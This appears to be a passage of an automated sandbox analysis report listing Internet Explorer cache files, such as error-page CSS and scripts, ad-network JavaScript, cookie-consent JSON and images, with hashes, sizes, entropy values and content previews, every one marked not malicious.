                                        SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                        SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\NewErrorPageTemplate[2]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1612
                                        Entropy (8bit):4.869554560514657
                                        Encrypted:false
                                        SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                        MD5:DFEABDE84792228093A5A270352395B6
                                        SHA1:E41258C9576721025926326F76063C2305586F76
                                        SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                        SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\a5ea21[2].ico
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):758
                                        Entropy (8bit):7.432323547387593
                                        Encrypted:false
                                        SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                        MD5:84CC977D0EB148166481B01D8418E375
                                        SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                        SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                        SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\a8a064[1].gif
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:GIF image data, version 89a, 28 x 28
                                        Category:dropped
                                        Size (bytes):16360
                                        Entropy (8bit):7.019403238999426
                                        Encrypted:false
                                        SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                        MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                        SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                        SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                        SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........|~|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........|~|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\auction[2].htm
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4617
                                        Entropy (8bit):5.963868756868799
                                        Encrypted:false
                                        SSDEEP:96:8zM7k7gM7kzMwom1bT5MGZTrmCA3FPdlJTIpDD7uPc39gnmaxgui:PsjwnT5o3ZdlJTItesgZgj
                                        MD5:10BA7EDAA109C1D8A965963D3439FEB3
                                        SHA1:F9B3D9517269A8E1ECAE7B2C4A9EFB6619710991
                                        SHA-256:F8EF977ED66ED6CB2226F2B2376D0FA854D0DB6493E8B55A4E10225E500BAB2C
                                        SHA-512:E69DA1E79F65C2E7AB9E4914C2BD4D4CBFDAC7FAFC0916A2153B4D1B14AB3FC0BD440FBE40D31506DB460A99F33CF927B2930D43DB2B1EAF1BE1470EE8F85642
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ..<script id="sam-metadata" type="text/html" data-json="{&quot;optout&quot;:{&quot;msaOptOut&quot;:false,&quot;browserOptOut&quot;:false},&quot;taboola&quot;:{&quot;sessionId&quot;:&quot;v2_5c5e93a0867973a40f977e8272da4cb7_bcba8ecb-5556-45fe-9da3-762342360bf7-tuct834abf9_1631266425_1631266425_CIi3jgYQr4c_GKfavNqZ3eLcBSABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAXAA&quot;},&quot;tbsessionid&quot;:&quot;v2_5c5e93a0867973a40f977e8272da4cb7_bcba8ecb-5556-45fe-9da3-762342360bf7-tuct834abf9_1631266425_1631266425_CIi3jgYQr4c_GKfavNqZ3eLcBSABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAXAA&quot;,&quot;pageViewId&quot;:&quot;f874d0463d1c4bd8a6f098442a1996cd&quot;,&quot;RequestLevelBeaconUrls&quot;:[]}">..</script>....<li class="single serversidenativead hasimage " data-json="{&quot;tvb&quot;:[],&quot;trb&quot;:[],&quot;tjb&quot;:[],&quot;p&quot;:&quot;gemini&quot;,&quot;e&quot;:true}" data-provider="gemini" data-ad-region="infopane" data-ad-index="13" data-viewability
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\dnserror[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2997
                                        Entropy (8bit):4.4885437940628465
                                        Encrypted:false
                                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                        MD5:2DC61EB461DA1436F5D22BCE51425660
                                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\down[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):748
                                        Entropy (8bit):7.249606135668305
                                        Encrypted:false
                                        SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                        MD5:C4F558C4C8B56858F15C09037CD6625A
                                        SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                        SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                        SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\down[2]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):748
                                        Entropy (8bit):7.249606135668305
                                        Encrypted:false
                                        SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                        MD5:C4F558C4C8B56858F15C09037CD6625A
                                        SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                        SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                        SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\e151e5[2].gif
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:GIF image data, version 89a, 1 x 1
                                        Category:dropped
                                        Size (bytes):43
                                        Entropy (8bit):3.122191481864228
                                        Encrypted:false
                                        SSDEEP:3:CUTxls/1h/:7lU/
                                        MD5:F8614595FBA50D96389708A4135776E4
                                        SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                        SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                        SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: GIF89a.............!.......,...........D..;
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\errorPageStrings[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4720
                                        Entropy (8bit):5.164796203267696
                                        Encrypted:false
                                        SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                        MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                        SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                        SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                        SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\errorPageStrings[2]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4720
                                        Entropy (8bit):5.164796203267696
                                        Encrypted:false
                                        SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                        MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                        SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                        SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                        SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\httpErrorPagesScripts[2]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):12105
                                        Entropy (8bit):5.451485481468043
                                        Encrypted:false
                                        SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                        MD5:9234071287E637F85D721463C488704C
                                        SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                        SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                        SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\nrrV27452[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):90611
                                        Entropy (8bit):5.421500848741912
                                        Encrypted:false
                                        SSDEEP:1536:uEuukXGs7RiUGZFVgRdillux5Q3Yzudp9o9uvby3TdXPH6viqQDkjs2i:atiX0di3p8urMfHgjg
                                        MD5:1EB648466B92897E80D5F3A64D02C011
                                        SHA1:624EE532FED7CCBC60DF3433DC3369AADE0F9226
                                        SHA-256:1C9605652D3D876ACA145E7F46F92E669E6A92C4AB27A1CBB454882BD58A1386
                                        SHA-512:1B7CEED799A6994991DCB8938A3B00BD64E1CEC17EC0775FC1CE844604805FEB20BEC3D72823730712BD0CB45B278F30FDD2CBA7319AD605323F667F39BF801C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]||(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)||""===n||null===n||(n=t,"[object Array]"!==Object.prototype.toString.call(n))||!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},t={},n={},a={},d={},c={},l={};function g(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=g("conversionpixelcontroller"),e=g("browserhinter"),o=g("kwdClickTargetModifier"),i=g("hover"),t=g("mraidDelayedLogging"),n=g("macrokeywords"),a=g("tcfdatamanager"),d=g("l3-reporting-observer-adapter"),c=g("editorial_blocking"),l=g("debuglogs"),{conversionPixelCo
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\1621266752856-586[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):195845
                                        Entropy (8bit):7.986893102264154
                                        Encrypted:false
                                        SSDEEP:3072:oTDjJlV5z0VKP9Wue3nJSnMZ+jVguSAFfdrEuQ3T/ixIBIvRNzWdqx6:o3jJl7Qg9Wuznd+uRXrEuQD/Abidqx6
                                        MD5:441833DE41DFE8D94AC6F8CE4E751EBA
                                        SHA1:0B498BD07F3146008C101714D95A3DD0284F8D85
                                        SHA-256:73C3655356EB29B6DB5B64F7C8E6AEBD1F94A20108AECAB1B26E6A32F205ADEA
                                        SHA-512:FF6D451DCF8F2DA27AD78E9B89BC6A690FE0D0F61B2A251765CEEC6F69D95C291DB8E6C54D27729B25A2FDF2073F7B48558789FFF073C7F5CA28E5BA3E9C6D33
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.............C....................................................................C.......................................................................p.n.............................................I........................!..1."A..Q#2a.q.B..$3R.b....C...%4Sr..'..&Dcs...................................@......................!1.AQa.q.."........2.B..#R3br..$...4C.S.............?.._+To...g..............H.Aa..|1.$..<~o..#...z..OW9....jv.P~....T.....>?.\W..7...]?...V.U..4l..Y..._...(6~..i.........A.suB....u!..+....]=.......'.....~:2........JL.6......p.e..wW.~y..^<.8...(.&.o3.)..&,."nQ@......y.<~z1,..B.d%C.o.r..F..]..S.7..?7_.9..P+.p..1?..s$.g..9G.."=.B;M....$...?.)q.}"I.#..._.oR>...]..nV..&&3n..K.`...V...=.b..........p...%.,#......c........E.d..6^Z.#..Wi..=..t...V%8$.|..~...d..>..nQJp.W..U..a...c......n....ht..,.P.,.j..w.^..e.%.g.>...T-....`.T.H..W.!..UB..Ex..KQo.G.j_x..3_V.9k..o(..!.t.e.r.P!.r..`..pO.>GJ.Y$5.r...Q:j|.....2d..S.X.^+q.0!...*......M.x..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\55a804ab-e5c6-4b97-9319-86263d365d28[1].json
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):2955
                                        Entropy (8bit):4.796538193381466
                                        Encrypted:false
                                        SSDEEP:48:Y9vlgmDHF6Bjb40UMRBrvdiZv5Gh8aZa6AyYAmHHPk5JKIcFerZjSaSZjfumjVT4:OymDwb40zrvdip5GHZa6AyQshjUjVjx4
                                        MD5:8FCB3F61085635194CE5A73516DE39F9
                                        SHA1:4EF7BB8362EE512BD497C48C168085738EE010C3
                                        SHA-256:CEC95B7811CBF927FD338529A08F6B1BBF12F5B78459D07D15DE92C60C12DD64
                                        SHA-512:DB60AF665E02724F527C6781396105C456E56D23691A64F57BDD452C0568EF43DE36F63D8B18702A5C5A6FA29C9C16CD6ADEBB74E28BA94AF7291EAC3095861D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: {"CookieSPAEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":false,"ScriptType":"LOCAL","Version":"6.4.0","OptanonDataJSON":"55a804ab-e5c6-4b97-9319-86263d365d28","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"6f0cca92-2dda-4588-a757-0e009f333603","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","br","bs","sd","bt","sg","bv","sh","bw","by","sj","bz","sl","sn","so","ca","sr","ss","cc","st","cd","sv","cf","cg","sx","ch","sy","ci","sz","ck","cl","cm","cn","co","tc","cr","td","cu","tf","tg","cv","th","cw","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","dj","tz","dm","do","ua","ug","dz","um","us","ec","eg","eh","uy","uz","va","er","vc","et","ve","vg","vi","vn","vu","fj","fk","fm","fo","wf","ga","ws","gd","ge","gg","gh
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AANuZgF[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):750
                                        Entropy (8bit):7.653501615166515
                                        Encrypted:false
                                        SSDEEP:12:6v/7Wrv0Y7COhH4wY2zKLlJsmUhrpB02KYMYv7LLMVjcS0mNUfozbbj3rtpQd3HO:xrcYOEV3KLXfIB9MYjHMVl0mKozbH3hv
                                        MD5:93D77F5C5FFACEBA12A1ABFC6190B947
                                        SHA1:8001474A7342EBF760C66F1C30E48E32E00F2AF3
                                        SHA-256:E6DA934C90931C6089ADB3D213DDD70C7104D0A182A98AB1C663CEDAE37F83A1
                                        SHA-512:D5F874DF89D82CC819B7D591766300FC701F0E1FFC6055D4CC4BA55F10674F88EDDA565EB1FA57886AC16A57926EBBBC9A108D45D057D76B904383247CE7EA50
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+......IDATx..S]HSq...~l.F.af....j..i.(........ ._r...[.!jE.c.....(..\.5.a.X.b.sMj.M.{;....z.....?.......s.--}*..$S.._|..EEA.......*$Q...#N;.d2.a.UU.r.".*lh...k.2...<..S.$>L..,...`$..../*hmr.st+.3Y..(.o..U8.\..G........K...../..q....E...>.EQ..+.j..Y..S.0K... P.%.z....h..=.C.>.`.YD....1."3x......z.1.....$dId.@4U..iG*...Q....[c_.kg.h...._~.?6.....u .N....68.j"....Pv*..$h....S...!...7..h..C"1.".1.,...>.`....L...sF..<..)...}.X..w....J...n[u...V..g.....E.+N......O..R..Yt<.i.y.j.aOM.N_.A..t.i.4a.._...........z....yR[@-..=.x.:....b'h.jmd..../.........P.B.p9...U...wQ.EJhLpi.XJ.....x..B...;6..HT.S.xz....a.(k....f.#.4z..Z g.q......$Z..@y........B..........IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgI04[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                        Category:dropped
                                        Size (bytes):18270
                                        Entropy (8bit):7.9654930351531235
                                        Encrypted:false
                                        SSDEEP:384:+9YbKbipKBt5GG2Ggs8ARclXpMoPr/ndxiX8olNEH+pDBiDxo:+9YpaGG2A8ARg/PrnKX/lrpDBiDa
                                        MD5:6B3564FF9F6056768A8036657B2E0DAC
